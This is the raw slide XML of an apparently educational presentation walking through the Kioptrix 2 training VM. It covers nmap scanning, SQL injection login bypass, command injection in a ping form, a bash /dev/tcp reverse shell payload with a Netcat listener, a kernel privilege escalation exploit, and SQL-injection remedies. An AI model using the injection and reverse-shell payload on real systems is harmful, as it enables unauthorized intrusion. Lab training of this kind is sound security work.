          <a:ext cx="2839212" cy="1338848"/>
        </a:xfrm>
        <a:prstGeom prst="round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Webpage</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65357" y="1473176"/>
        <a:ext cx="2708498" cy="1208134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{57206555-98BB-42A2-BCF1-793B0D6E2372}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4827416" y="959291"/>
          <a:ext cx="1071078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“Boot to root” </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200" dirty="0" smtClean="0"/>
            <a:t>image for training and fun</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="2999782"/>
        <a:ext cx="4995202" cy="966506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B148144A-EB97-4ACE-9F2B-17B116249638}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2813610"/>
          <a:ext cx="2839212" cy="1338848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Purpose</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65357" y="2878967"/>
        <a:ext cx="2708498" cy="1208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BB15E-3CDD-4D88-B074-1DC8D4660CE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0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Attacker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Scan Target Machine</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="23861" y="23861"/>
        <a:ext cx="5362379" cy="766951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67BB1122-201A-4BA9-B3EF-6126B527E03B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="473202" y="927822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Website – Login Page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SQL Injection – Bypass Authentication</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="497063" y="951683"/>
        <a:ext cx="5286330" cy="766951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BFE089F5-A00B-4F38-BFD7-8F7EDFFA53FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="946404" y="1855644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Internal Application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Remote Code Execution – Reverse Shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970265" y="1879505"/>
        <a:ext cx="5286330" cy="766951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{853E1AF7-0ED2-4BB1-9049-19B3624BA944}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1419605" y="2783467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Server Access – Low Privileged User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Privilege Escalation – Kernel Exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1443466" y="2807328"/>
        <a:ext cx="5286330" cy="766951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{396785C7-DCE7-443D-8193-31D88B86BC9C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1892808" y="3711289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Server Access - root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Unfettered Access</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1916669" y="3735150"/>
        <a:ext cx="5286330" cy="766951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CEC6B617-4D6C-4C87-9041-5E91E733C732}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5807254" y="595164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926400" y="595164"/>
        <a:ext cx="291245" cy="398477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ECC8856E-D9C0-4F8F-9E9C-AA82E21BBEDC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6280456" y="1522986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399602" y="1522986"/>
        <a:ext cx="291245" cy="398477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7560F2C6-23F9-40DB-9FC1-400D5BEBA656}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6753658" y="2437231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872804" y="2437231"/>
        <a:ext cx="291245" cy="398477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6012EF4B-A10D-4A0A-90B0-309B54A8D539}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7226860" y="3374105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346006" y="3374105"/>
        <a:ext cx="291245" cy="3984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4CECC-1F65-4099-A139-F4D80312019E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4827416" y="-1852291"/>
          <a:ext cx="1071078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Analyze running service (HTTP) for information gathering and potential ways further into the asset</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="188200"/>
        <a:ext cx="4995202" cy="966506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2028"/>
          <a:ext cx="2839212" cy="1338848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Goal</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65357" y="67385"/>
        <a:ext cx="2708498" cy="1208134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2942CD4B-47CA-4483-A9EE-76E37B1CB79F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4827416" y="-446500"/>
          <a:ext cx="1071078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Navigating resources manually and/or automated. Perform various tests (client-side controls logic flaws, authentication, session management, access controls, errors, information leakage, etc.,.)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="1593991"/>
        <a:ext cx="4995202" cy="966506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{102BBF15-4727-4393-AF3A-5C93A7FE827C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1407819"/>
          <a:ext cx="2839212" cy="1338848"/>
        </a:xfrm>
        <a:prstGeom prst="round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Method</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65357" y="1473176"/>
        <a:ext cx="2708498" cy="1208134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{73735DA2-F571-406E-8673-FDB4FEC56E12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4827416" y="959291"/>
          <a:ext cx="1071078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Burp Suite, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" err="1"/>
            <a:t>Nikto</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
            <a:t>, Zed Attack Proxy,  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" err="1"/>
            <a:t>Dirb</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
            <a:t>, etc.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="2999782"/>
        <a:ext cx="4995202" cy="966506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CDD1640-CB18-4897-9DEB-AB94F5729236}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2813610"/>
          <a:ext cx="2839212" cy="1338848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Common Tools</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65357" y="2878967"/>
        <a:ext cx="2708498" cy="12081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4CECC-1F65-4099-A139-F4D80312019E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4552343" y="-1510428"/>
          <a:ext cx="1621224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/>
            <a:t>Obtain access to the target machine or be able to manipulate it in a way the attacker intends to</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="281846"/>
        <a:ext cx="4968346" cy="1462940"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="50"/>
          <a:ext cx="2839212" cy="202653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/>
            <a:t>Goal</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="98927" y="98977"/>
        <a:ext cx="2641358" cy="1828676"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B1F1AE5B-A95F-4B03-BFFF-E9B5460A950D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4552343" y="617428"/>
          <a:ext cx="1621224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/>
            <a:t>Further enumeration of newly accessed resources</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="2409702"/>
        <a:ext cx="4968346" cy="1462940"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{78AEF0B4-BBB7-4AE1-BACD-25EAED873C2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2127907"/>
          <a:ext cx="2839212" cy="2026530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/>
            <a:t>Method</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="98927" y="2226834"/>
        <a:ext cx="2641358" cy="18286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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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3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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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3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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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3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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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0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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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5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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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3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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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0C-EF25-4072-96E1-1F574F8DA17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3F2-44D4-4001-9C2D-DD9B18F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6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FA00C-EF25-4072-96E1-1F574F8DA17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833F2-44D4-4001-9C2D-DD9B18F0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-db.com/exploits/954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Kioptrix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2 Walkthrough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guide on how to successfully compromise an intentionally vulnerable OS for fun and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4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Breach</a:t>
            </a:r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54676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531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Once logged in, we’re presented with an application that pings a machine on the network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Normal functionality (input: 192.168.233.128)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95C36B-1CEA-405A-848A-38E7E92B7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43200"/>
            <a:ext cx="581025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6F3F84-EF22-4F8C-AF17-FB5F00D1F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572000"/>
            <a:ext cx="42386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1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Abnormal Input Test 1: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Test 1 Output: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CE0192-F7D4-410B-950E-4E8CA889B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86000"/>
            <a:ext cx="5791200" cy="981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A19D35-0749-4A3A-88A2-B4F70E92D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114800"/>
            <a:ext cx="4210050" cy="1543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B3C34E-2F3F-4DE6-BF9D-998BECC3DB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="5657850"/>
            <a:ext cx="3124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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” command 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E979086-BF43-4288-8F03-6AA0918F3FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2827482" y="5630209"/>
            <a:ext cx="266700" cy="1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11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Abnormal Input Test 2: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Test 2 Output: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129A05F-B951-4DC2-81E5-08D035A6CC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="3939597"/>
            <a:ext cx="4306743" cy="1993702"/>
            <a:chOff x="2286000" y="3939597"/>
            <a:chExt cx="4306743" cy="199370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A5FA5CB6-848B-44D7-AE6B-E4DEE3E7B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0" y="3939597"/>
              <a:ext cx="4276725" cy="16859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AB3C34E-2F3F-4DE6-BF9D-998BECC3DB63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3468543" y="5625522"/>
              <a:ext cx="31242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“ls” command output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1E979086-BF43-4288-8F03-6AA0918F3FA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3048001" y="5486401"/>
              <a:ext cx="420542" cy="29301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C205542-DE03-4731-A946-87F8D8004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286000"/>
            <a:ext cx="57816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5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1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/>
              <a:t>Breach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="51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553802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47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Setting up a listener on the attacking machine with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat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997FC82-2988-4F8C-B9DA-3C8DCB49D721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854894" y="4283501"/>
            <a:ext cx="115640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Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat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BEDF9D9-E724-4FB1-93B1-0F24BB8427EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3222631" y="3347491"/>
            <a:ext cx="13527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Listen mode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83330AC9-4286-47B0-BD02-F5A39DE37BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4011301" y="4145145"/>
            <a:ext cx="125730" cy="23643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4AB73CE4-2494-4453-9AC8-75AC89646767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4365631" y="3650528"/>
            <a:ext cx="152400" cy="1594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C41AA37B-A3C5-4BB4-99FD-688E91FFE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860226"/>
            <a:ext cx="3043717" cy="2646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FA3613A-899F-494B-8BC0-853E38865B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4213231" y="4416623"/>
            <a:ext cx="8496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Verbose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93C59DE-1F7E-4872-A4AD-A8DC333F1853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4594231" y="4124897"/>
            <a:ext cx="108572" cy="2917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FB067F0-36F4-4600-8522-C4DF9A337D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5280031" y="3347491"/>
            <a:ext cx="16634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Port to listen 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8B8464B8-27D2-443B-A640-9ABE057E9C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276845" y="3650528"/>
            <a:ext cx="155586" cy="19289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3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Remote Code Execution: Bash Reverse Shell*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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“192.168.233.128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/192.168.233.128/1234 0&gt;&amp;1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8A865E-331C-4D77-AE07-50384CF20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3" y="3124200"/>
            <a:ext cx="5781675" cy="942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992A10-AEAB-49B9-A6F7-2458EE5B26F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="6553200"/>
            <a:ext cx="1905000" cy="136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*credit to pentestmonkey.net</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111851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Back on the attacking machine, we’re presented with shell access on the target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9442F5-0810-4F8C-ABFD-AF39A774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505200"/>
            <a:ext cx="717314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2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4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Privilege Escalation</a:t>
            </a:r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119694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368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Privilege Escalation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Found a disclosed a Ring0 Privilege Escalation vulnerability for Linux Kernel 2.6 &lt; 2.6.19 on Exploit-db.com (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>link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FD1E78-331A-4222-8592-6B02C8C9E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362200"/>
            <a:ext cx="8077200" cy="6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0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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="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r>
              <a:rPr lang="en-US" sz="3500"/>
              <a:t>Agenda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2644518"/>
            <a:ext cx="6759789" cy="368008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Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remedies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="495591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4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Privilege Escalation</a:t>
            </a:r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083343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654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Privilege Escalation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On the target machine as the root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8C37CE-146D-4F12-9333-13AADD73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667000"/>
            <a:ext cx="6781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58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Protect against SQL Injections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Prepared Statements (Parameterized Queries)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Stored Procedures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Whitelist Input validation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Escaping ALL user supplied input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring/Alerting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320427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Remedies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="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348265"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="628650" y="1712912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110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4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176069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010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F4821D-8C36-473D-9F9A-3DED6079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 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3456E90D-620E-41C5-B67D-57C2BD77B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4108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889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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9E706731-3860-4E73-9335-A870F6741F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7306952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xmlns="" id="{CD2ED21F-DC95-4AD1-8327-D561F5FCA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7035252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E18BCC1-F353-4FA8-A88E-198C424DC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93" y="2518687"/>
            <a:ext cx="2323308" cy="1626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EFE5FCC-ED2E-4958-9000-F7C3AEC3B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180" y="4757852"/>
            <a:ext cx="1737518" cy="1399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D77C5EF-C488-48DF-8996-8CD8EC591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22" y="835158"/>
            <a:ext cx="3094779" cy="7845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893343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Host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1249"/>
            <a:ext cx="4280673" cy="4155713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Goal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Discover what open ports and services exist on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method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Perform a scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(send information to target and analyze the responses in an automated fashion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan Types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Ping scan, TCP SYN scan (half), TCP Connect, UDP, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common Tools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Nmap, ping, traceroute, Netcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9504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F91513-CD83-41AE-8193-DE6B89B4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Host Enumeration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94C1968-4A42-4864-B143-CCEF7ACED8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2323531" y="1905000"/>
            <a:ext cx="4496939" cy="1477923"/>
            <a:chOff x="2323531" y="1905000"/>
            <a:chExt cx="4496939" cy="14779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7D0BACB5-B0D5-4C1C-99EC-5F4694D71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2209" y="1905000"/>
              <a:ext cx="3609975" cy="2381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F37E391F-695E-4030-819A-BE1616718784}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2323531" y="2407857"/>
              <a:ext cx="96019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Run </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>nmap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D448DCB4-149E-4914-BFAF-CFA0CE57E915}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2950095" y="2828925"/>
              <a:ext cx="127592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Stealth Scan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(Half-Open)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182D47F-13E4-4085-B4AC-DCCADFD92A54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6011209" y="2467605"/>
              <a:ext cx="8092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Target IP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24446E9-E092-4789-B4F6-0ABE7A64A59E}"/>
